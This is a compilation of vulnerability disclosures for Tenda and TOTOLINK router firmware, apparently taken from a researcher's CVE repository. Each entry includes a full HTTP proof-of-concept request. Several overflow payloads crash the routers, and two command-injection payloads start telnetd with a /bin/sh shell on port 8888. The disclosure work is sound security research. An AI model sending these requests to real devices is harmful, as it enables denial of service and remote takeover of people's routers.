Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetDeviceName. This vulnerability allows attackers to cause a Denial of Service (DoS) via the devName parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formSetDeviceName` function, `devName` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `devName` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_32/images/1.png)

As you can see here, the input has not been checked. In `set_device_name` function, the parameter `devName` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_32/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

> The parameter `mac` does not cause a buffer overflow because its length is limited to 20 in the function `lower_mac`.

In `libcommonprod.so` binary:

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_32/images/3.png)

**PoC**

We set `devName` as **aaaaaaaaaaaaa.........** , and the router will crash, such as:

> The string needs to contain \\r, otherwise the vulnerability cannot be triggered

POST /goform/SetOnlineDevName HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 330
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/parental\_control.html?random=0.6900448104060756&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0smscvb

devName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=e0:be:03:25:12:36

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_32/images/4.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24160: my_vuln/32.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a heap overflow in the function GetParentControlInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mac parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Heap Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an heap overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Heap Overflow**

In `httpd` binary:

In `GetParentControlInfo` function, `mac` is directly passed by the attacker, If this part of the data is too long, it will cause the heap overflow, so we can control the `mac` to crash the program.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_26/images/1.png)

As you can see here, the input has not been checked. In `GetParentControlInfo` function, the parameter `mac` is directly copy to a local variable placed on the heap, which overflow the heap and crash the program.

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `mac` as **aaaaaaaaaaaaaaaaaaa.......** , and the router will crash, such as:

GET /goform/GetParentControlInfo?mac=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&random=0.9435881419838728 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.1.1/parental\_control.html?random=0.5578315870107804&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0lwgcvb

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_26/images/2.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24161: my_vuln/26.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetPPTPServer. This vulnerability allows attackers to cause a Denial of Service (DoS) via the startIp and endIp parameters.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formSetPPTPServer` function, `startIp、endIp` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `startIp、endIp` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_28/images/1.png)

As you can see here, the input has not been checked. In `formSetPPTPServer` function, the parameter `startIp、endIp` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `startIp` as **aaaaaa............0.0.100** , and the router will crash, such as:

POST /goform/SetPptpServerCfg HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1062
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/pptp\_server.html?random=0.2812259468544036&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0zrmcvb

serverEn=1&startIp=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.0.0.100&endIp=10.0.0.200&mppe=0&mppeOp=128

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_28/images/2.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24159: my_vuln/28.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function fromSetIpMacBind. This vulnerability allows attackers to cause a Denial of Service (DoS) via the list parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `fromSetIpMacBind` function, `list` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `list` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_23/images/1.png)

As you can see here, the input has not been checked. In `fromSetIpMacBind` function, the parameter `list` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `list` as **aaaaaaaaaaaaaaaaaaaaaaa............** , and the router will crash, such as:

POST /goform/SetIpMacBind HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 850
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/ip\_mac\_bind.html?random=0.6185321891219839&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0msycvb

bindnum=2&list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
ee0:be:03:25:12:36192.168.1.102

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_23/images/2.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24158: my_vuln/23.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function formSetMacFilterCfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the deviceList parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:AX3

Version:V16.03.12.10\_CN(Download Link:https://www.tenda.com.cn/download/detail-3238.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formSetMacFilterCfg` function, `deviceList` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `deviceList` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_31/images/1.png)

As you can see here, the input has not been checked. In `set_macfilter_rules_by_one` function, the parameter `deviceList` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_31/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `deviceList` as **aaaaaaaaaa......\\r\\n** , and the router will crash, such as:

> The string needs to contain \\r, otherwise the vulnerability cannot be triggered

POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/mac\_filter.html?random=0.07062162644036918&
Cookie: password=f5bb0c8de146c67b44babbf4e6584cc0qyccvb

macFilterType=black&deviceList=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_31/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24157: my_vuln/31.md at main · pjqwudi/my_vuln

Totolink devices A3100R v4.1.2cu.5050_B20200504, A830R v5.9c.4729_B20191112, and A720R v4.1.5cu.470_B20200911 were discovered to contain command injection vulnerability in the function setNoticeCfg. This vulnerability allows attackers to execute arbitrary commands via the IpFrom parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A3100R、A830R、A720R

Version:A3100R\_Firmware(V4.1.2cu.5050\_B20200504)、A830R\_Firmware(V5.9c.4729\_B20191112)、A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Remote Command Execution

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `setNoticeCfg` function,`IpFrom` is directly passed by the attacker, so we can control the `IpFrom` to attack the OS.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_1/images/1.png)

**Supplement**

Initially, I discovered this vulnerability on A720R, which is located in `cstecgi.cgi`. Interestingly, during the process of observing other devices, I found that this function was encapsulated in `system.so`, such as A3100R; finally, I completed the verification on the A3100R device.

**PoC**

We set `IpFrom` as **;bin/telnetd;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 37
Origin: http://192.168.0.1
Connection: close

{"topicurl":"setting/setNoticeCfg","NoticeEnabled":"1","NoticeUrl":"www.baidu.com","BtnName":"abc123","WhiteListUrl1":"www.baidu.com","WhiteListUrl2":"","WhiteListUrl3":"","IpFrom":";/bin/telnetd;","IpTo":"4","NoticeTimeoutVal":"120"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_1/images/2.png)

**Result**

The target router has enabled the telnet service

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_1/images/3.png)

CVE-2021-44247: my_vuln/1.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function NTPSyncWithHost. This vulnerability allows attackers to execute arbitrary commands via the parameter host_time.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Remote Command Execution

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `cstecgi.cgi` binary:

In `NTPSyncWithHost` function,`host_time` is directly passed by the attacker, so we can control the `host_time` to attack the OS.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_7/images/1.png)

**Supplement**

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `host_time` as **';/usr/sbin/telnetd;'** , and the router will excute it, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/time.html?time=1639032360781
Cookie: SESSION\_ID=2:1420071268:2

{"host\_time":"';/usr/sbin/telnetd;'","topicurl":"NTPSyncWithHost"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_7/images/2.png)

We set `host_time` as **';telnetd -l /bin/sh -p 8888 -b 0.0.0.0;'** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 86
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/time.html?time=1639032360781
Cookie: SESSION\_ID=2:1420071268:2

{"host\_time":"';telnetd -l /bin/sh -p 8888 -b 0.0.0.0;'","topicurl":"NTPSyncWithHost"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_7/images/3.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_7/images/4.png)

Get a shell!

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_7/images/5.png)

CVE-2021-45733: my_vuln/7.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a stack overflow in the function setUrlFilterRules. This vulnerability allows attackers to cause a Denial of Service (DoS) via the url parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recentl, allows remote attackers to crash the server.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setUrlFilterRules` function, `url` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `url` to crash the server.

The input has not been checked.And then,call the function nvram\_set to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_10/images/1.png)

In `rc` binary:

Eventually, the initial input will be extracted and cause the stack overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_10/images/2.png)

As you can see here,The length of the input array(v3) is only 256 bytes, we can tamper with the content of the `url` field, such as a very long string.After that, it will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_10/images/3.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `url` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1677
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/urlf.html
Cookie: SESSION\_ID=2:1420070644:2

{"url":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","addEffect":"1","topicurl":"setUrlFilterRules"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_10/images/4.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45734: my_vuln/10.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formAddDnsForward. This vulnerability allows attackers to cause a Denial of Service (DoS) via the DnsForwardRule parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formAddDnsForward` function, `DnsForwardRule` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `DnsForwardRule` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_5/images/1.png)

As you can see here, the input has not been checked. In `DnsForwardRule` function, the parameter `rules` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_5/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `DnsForwardRule` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /goform/addDNSForward HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 3015
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/network/DNSForward.html?0.6039736643785214
Cookie: \_:USERNAME:\_=; G3v3\_user=

DnsForwardRule=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa